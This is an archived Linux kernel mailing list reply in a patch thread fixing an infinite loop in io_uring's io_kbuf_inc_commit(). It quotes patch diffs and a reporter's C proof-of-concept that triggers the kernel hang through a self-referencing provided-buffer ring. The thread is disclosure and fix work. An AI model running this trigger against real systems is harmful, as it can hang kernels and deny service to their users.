lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <8abaf4ad-d457-422d-9e9e-932cab2588e6@kernel.dk>
Date: Wed, 27 Aug 2025 20:08:05 -0600
From: Jens Axboe <axboe@...nel.dk>
To: Qingyue Zhang <chunzhennn@...com>
Cc: aftern00n@...com, io-uring@...r.kernel.org, linux-kernel@...r.kernel.org
Subject: Re: [PATCH 2/2] io_uring/kbuf: fix infinite loop in
 io_kbuf_inc_commit()

On 8/27/25 7:36 PM, Qingyue Zhang wrote:
> On 2025-08-27 21:45 UTC, Jens Axboe wrote:
>> I took a closer look and there's another spot where we should be
>> using READ_ONCE() to get the buffer length. How about something like
>> the below rather than the loop work-around?
>>
>>
>> commit 7f472373b2855087ae2df9dc6a923f3016a1ed21
>> Author: Jens Axboe <axboe@...nel.dk>
>> Date:   Wed Aug 27 15:27:30 2025 -0600
>>
>>     io_uring/kbuf: always use READ_ONCE() to read ring provided buffer lengths
>>     
>>     Since the buffers are mapped from userspace, it is prudent to use
>>     READ_ONCE() to read the value into a local variable, and use that for
>>     any other actions taken. Having a stable read of the buffer length
>>     avoids worrying about it changing after checking, or being read multiple
>>     times.
>>     
>>     Fixes: c7fb19428d67 ("io_uring: add support for ring mapped supplied buffers")
>>     Link: https://lore.kernel.org/io-uring/tencent_000C02641F6250C856D0C26228DE29A3D30A@qq.com/
>>     Reported-by: Qingyue Zhang <chunzhennn@...com>
>>     Signed-off-by: Jens Axboe <axboe@...nel.dk>
>>
>> diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
>> index 81a13338dfab..394037d3f2f6 100644
>> --- a/io_uring/kbuf.c
>> +++ b/io_uring/kbuf.c
>> @@ -36,15 +36,18 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
>>  {
>>  	while (len) {
>>  		struct io_uring_buf *buf;
>> -		u32 this_len;
>> +		u32 buf_len, this_len;
>>  
>>  		buf = io_ring_head_to_buf(bl->buf_ring, bl->head, bl->mask);
>> -		this_len = min_t(u32, len, buf->len);
>> -		buf->len -= this_len;
>> -		if (buf->len) {
>> +		buf_len = READ_ONCE(buf->len);
>> +		this_len = min_t(u32, len, buf_len);
>> +		buf_len -= this_len;
>> +		if (buf_len) {
>>  			buf->addr += this_len;
>> +			buf->len = buf_len;
>>  			return false;
>>  		}
>> +		buf->len = 0;
>>  		bl->head++;
>>  		len -= this_len;
>>  	}
>> @@ -159,6 +162,7 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>>  	__u16 tail, head = bl->head;
>>  	struct io_uring_buf *buf;
>>  	void __user *ret;
>> +	u32 buf_len;
>>  
>>  	tail = smp_load_acquire(&br->tail);
>>  	if (unlikely(tail == head))
>> @@ -168,8 +172,9 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>>  		req->flags |= REQ_F_BL_EMPTY;
>>  
>>  	buf = io_ring_head_to_buf(br, head, bl->mask);
>> -	if (*len == 0 || *len > buf->len)
>> -		*len = buf->len;
>> +	buf_len = READ_ONCE(buf->len);
>> +	if (*len == 0 || *len > buf_len)
>> +		*len = buf_len;
>>  	req->flags |= REQ_F_BUFFER_RING | REQ_F_BUFFERS_COMMIT;
>>  	req->buf_list = bl;
>>  	req->buf_index = buf->bid;
>> @@ -265,7 +270,7 @@ static int io_ring_buffers_peek(struct io_kiocb *req, struct buf_sel_arg *arg,
>>  
>>  	req->buf_index = buf->bid;
>>  	do {
>> -		u32 len = buf->len;
>> +		u32 len = READ_ONCE(buf->len);
>>  
>>  		/* truncate end piece, if needed, for non partial buffers */
>>  		if (len > arg->max_len) {
> 
> I'm afraid this doesn't solve the problem. The value of buf->len
> could be changed before the function is called. Maybe we shouldn't
> trust it at all?
> 
> Here is a PoC that can still trigger infinite loop:
> 
> #include<liburing.h>
> #include<liburing/io_uring.h>
> #include<netinet/in.h>
> #include<stdint.h>
> #include<sys/socket.h>
> #include<arpa/inet.h>
> #include<stdlib.h>
> int main(){
>     struct io_uring ring;
>     struct io_uring_buf* buf_info;
> 
>     posix_memalign((void**)&buf_info, 4096, 4096);
>     char* buf = malloc(0x1000);
>     struct io_uring_buf_reg reg = {
>         .ring_addr = (uint64_t)buf_info,
>         .ring_entries = 2
>     };
>     buf_info[0].addr = (uint64_t)buf_info;
>     buf_info[0].len = 0x1000;
>     buf_info[0].bid = 0;
>     buf_info[0].resv = 1; // tail
>     io_uring_queue_init(0x10, &ring, IORING_SETUP_NO_SQARRAY);
>     io_uring_register_buf_ring(&ring, &reg, IOU_PBUF_RING_INC);
> 
>     int fds[2];
>     socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
>     void* send_buf = calloc(1, 32);
>     send(fds[0], send_buf, 32, MSG_DONTWAIT);
> 
>     struct io_uring_sqe* sqe = io_uring_get_sqe(&ring);
>     io_uring_prep_recv(sqe, fds[1], NULL, 0, 0);
>     sqe->flags |=  1<<IOSQE_BUFFER_SELECT_BIT;
>     io_uring_submit(&ring);
>     struct io_uring_cqe* cqe;
>     io_uring_wait_cqe(&ring, &cqe);
> }

Gotcha, yes the READ_ONCE() will ensure we only read it once and it
can't get changed in between in that loop, but this one receives into
the buffer ring.

I don't think there's anything wrong with the looping, and stopping at
the other end is of course a safeguard, but couldn't we just abort the
loop if we see a 0 sized buffer? At that point we know the buffer is
invalid, or the kernel is buggy, and it'd be saner to stop at that
point. Something a la:


diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index 394037d3f2f6..19a8bde5e1e1 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -42,7 +42,8 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
 		buf_len = READ_ONCE(buf->len);
 		this_len = min_t(u32, len, buf_len);
 		buf_len -= this_len;
-		if (buf_len) {
+		/* Stop looping for invalid buffer length of 0 */
+		if (buf_len || !this_len) {
 			buf->addr += this_len;
 			buf->len = buf_len;
 			return false;

-- 
Jens Axboe

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ